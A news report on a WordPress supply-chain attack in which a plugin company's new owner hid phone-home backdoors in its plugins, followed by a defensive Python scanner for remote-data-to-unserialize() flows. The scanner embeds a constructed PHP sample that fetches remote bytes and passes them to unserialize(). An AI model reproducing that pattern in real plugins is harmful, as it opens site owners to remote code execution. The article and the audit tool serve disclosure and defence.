More than 20,000 WordPress websites have been compromised in a sophisticated supply chain attack in which a newly acquired plugin developer inserted hidden backdoors into more than 30 plugins, allowing malicious code to be silently distributed to any website running the affected software. The attack came to light after Austin Ginder, founder of web hosting firm Anchor Hosting, raised the alarm in a detailed blog post, and it has prompted WordPress to permanently remove all affected plugins from its official directory and issue security warnings to impacted site administrators.
The malicious company at the centre of the attack is called Essential Plugin, which claims its products have been installed more than 400,000 times and were being actively used by more than 15,000 customers, with the official WordPress repository showing more than 20,000 active installations at the time of the incident. According to Anchor Hosting’s investigation, version 2.6.7 of one of the affected plugins, Countdown Timer Ultimate, released on August 8, 2025, introduced the malicious code pathway while disguising the change behind a routine-looking compatibility note, with the attack then weaponised on April 5 and 6, 2026. The backdoor operated by phoning home to a server controlled by the attacker, pulling instructions, and using an unsafe deserialization flow to execute arbitrary code across infected installations, effectively giving the attacker remote control over every affected website without needing to breach each one individually.
The delayed activation is one of the most significant details of the entire incident. The malicious pathway was introduced in August 2025 but not activated until April 2026, a gap of several months that allowed the ownership transition to fade from immediate scrutiny and gave the attacker’s infrastructure time to blend into the normal update history of the plugins. Ginder warned that WordPress users are not notified of any plugin’s change in ownership, exposing users to potential takeover attacks by new owners, and noted that this is the second known hijacking of a WordPress plugin discovered in as many weeks. WordPress’s response on April 7, 2026 included sending security warnings directly to site owners’ admin dashboards, permanently closing all 26 plugins in the Essential Plugin family so they could no longer be installed from the official directory, and releasing a forced update on April 8 that added code to block the phone-home functionality connecting infected sites to the attacker’s server. However, security researchers noted that the forced update did not automatically clean already-infected configuration files on affected sites, meaning website owners must still manually audit their installations and remove any compromised plugins. Essential Plugin has not issued a public response to the incident.
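The unsafe deserialization flow described above, in which instructions pulled from a remote server are fed straight into PHP's unserialize(), is a pattern that a site administrator auditing plugin code can search for. What follows is an added example, not code from the article, from Essential Plugin, or from Anchor Hosting: a small Python scanner that performs line-level taint tracking over PHP source, treating the return values of WordPress's wp_remote_get()/wp_remote_retrieve_body() and a few raw PHP equivalents as attacker-controlled, and reporting any unserialize() whose argument derives from them. The sample plugin files embedded in it are constructed for the demonstration and do not reproduce any real plugin.

```python
"""Audit PHP plugin source for remote-fetch -> unserialize() data flows.

Added example for illustration; not the code of any real plugin or vendor.
"""
import re
from dataclasses import dataclass

# PHP/WordPress calls whose return value is controlled by whoever runs the
# remote server (assumption: any of these is treated as a taint source).
REMOTE_SOURCES = {
    "wp_remote_get", "wp_remote_post", "wp_remote_request",
    "wp_remote_retrieve_body", "curl_exec", "file_get_contents",
}

ASSIGN_RE = re.compile(r'^\s*(\$\w+)\s*=(?!=)\s*(.*)$')   # $var = <rhs>
CALL_RE = re.compile(r'\b(\w+)\s*\(')                       # function names
VAR_RE = re.compile(r'\$\w+')                               # PHP variables
UNSERIALIZE_RE = re.compile(r'\bunserialize\s*\((.*)$')     # argument text
ALLOWED_CLASSES_OFF = re.compile(r"['\"]allowed_classes['\"]\s*=>\s*false")
LINE_COMMENT_RE = re.compile(r'(?<!:)//.*$')                # keep "https://"


@dataclass
class Finding:
    path: str
    line: int
    severity: str   # "high": unrestricted unserialize; "medium": allowed_classes => false
    code: str


def scan_php(path: str, source: str) -> list[Finding]:
    """Line-oriented taint tracking within one file.

    A variable assigned from a remote source, or from any expression that
    mentions an already-tainted variable, becomes tainted; reassigning it from
    a clean expression clears the taint. An unserialize() whose argument is
    tainted (or calls a remote source directly) is reported.
    """
    tainted: set[str] = set()
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        code = LINE_COMMENT_RE.sub("", line)
        m = UNSERIALIZE_RE.search(code)
        if m:
            arg = m.group(1)
            uses_remote = set(CALL_RE.findall(arg)) & REMOTE_SOURCES
            if uses_remote or set(VAR_RE.findall(arg)) & tainted:
                sev = "medium" if ALLOWED_CLASSES_OFF.search(arg) else "high"
                findings.append(Finding(path, lineno, sev, line.strip()))
        a = ASSIGN_RE.match(code)
        if a:
            lhs, rhs = a.group(1), a.group(2)
            from_remote = set(CALL_RE.findall(rhs)) & REMOTE_SOURCES
            if from_remote or set(VAR_RE.findall(rhs)) & tainted:
                tainted.add(lhs)
            else:
                tainted.discard(lhs)
    return findings


def audit(plugins: dict[str, str]) -> list[Finding]:
    """Scan every (path, source) pair and return all findings in order."""
    results: list[Finding] = []
    for path, source in plugins.items():
        results.extend(scan_php(path, source))
    return results


# Constructed sample plugin sources for the demonstration (hypothetical
# paths and URLs; not taken from any real plugin).
SAMPLE_PLUGINS = {
    "backdoored/update-check.php": """<?php
function epl_check_update() {
    $resp = wp_remote_get( 'https://updates.example.invalid/check' );
    $body = wp_remote_retrieve_body( $resp );
    $task = unserialize( base64_decode( $body ) );  // remote bytes into unserialize()
    return $task;
}
""",
    "restricted/cache.php": """<?php
$raw  = wp_remote_retrieve_body( wp_remote_get( 'https://api.example.invalid/status' ) );
$opts = unserialize( $raw, array( 'allowed_classes' => false ) );
""",
    "clean/status.php": """<?php
$resp = wp_remote_get( 'https://api.example.invalid/status' );
$data = json_decode( wp_remote_retrieve_body( $resp ), true );
""",
}

if __name__ == "__main__":
    for f in audit(SAMPLE_PLUGINS):
        print(f"[{f.severity.upper()}] {f.path}:{f.line}: {f.code}")
```

The scanner is a heuristic: it tracks flow within a single file and line, so data passed through a function parameter, a class property or a database round-trip is not followed. That last gap matters here, because the article notes that the forced update did not clean already-infected configuration files; a payload persisted in a site's options table would not be flagged by a source-level check like this one, which is why affected site owners still need to audit their installations and remove the compromised plugins.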